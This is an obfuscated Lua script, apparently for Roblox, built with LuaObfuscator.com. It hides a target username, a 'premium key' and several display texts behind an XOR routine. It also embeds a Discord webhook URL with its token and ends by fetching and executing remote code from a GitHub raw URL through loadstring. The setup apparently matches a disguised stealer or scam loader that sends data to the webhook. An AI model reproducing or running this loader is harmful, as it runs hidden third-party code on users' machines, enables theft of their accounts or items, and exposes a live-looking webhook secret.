--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.4) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v8,v9)local v10={};for v11=1 + 0 + 0 , #v8 do v6(v10,v0(v4(v1(v2(v8,v11,v11 + (2 -1) )),v1(v2(v9,(2 -(1 + 0)) + ((v11-(3 -2))% #v9) ,(863 -(189 + 673)) + 0 + ((v11-(1 + 0 + (527 -(93 + 434))))% #v9) + ((2971 -2115) -(365 + (2346 -(1475 + 381)))) )))%(53 + 203) ));end return v5(v10);end UserName=v7("\9\208\68\109\77\59\88\2\40\196\77\121\118\46","\67\177\47\24\47\122\19\67");Webhook="https://discord.com/api/webhooks/1077369381920706560/QLZBuoFlQ2GQUbDdA8KVWySAXRZcNNsx5HAT-tTJlPl-fWgO0BbGmWhR5ZQ-jElfdnt6";_G.PremiumKey=v7("\88\58\253\19\32\91\95\63\225\40\100\91\18\0\242\63","\106\106\151\73\81\99");_G.ScriptName=v7("\78\7\27\245\24\86\3\1\146\30\76","\30\66\79\213\91");_G.FirstText=v7("\37\224\155\246\237\2\163\185\237\248\6\226\155\246\243\17","\118\131\233\159\157");_G.SecondText=v7("\24\34\207\8\204\175\248\7\46\220\5\213\181\191\101\111\147","\75\65\189\97\188\219\216");_G.ThirdText=v7("\231\122\218\2\215\255\134\82\216\3\193\165\136\56","\166\22\183\109\164\139");_G.WaitingTime=180;loadstring(game:HttpGet("https://raw.githubusercontent.com/k4ftt/rizzhub/main/New.lua"))();
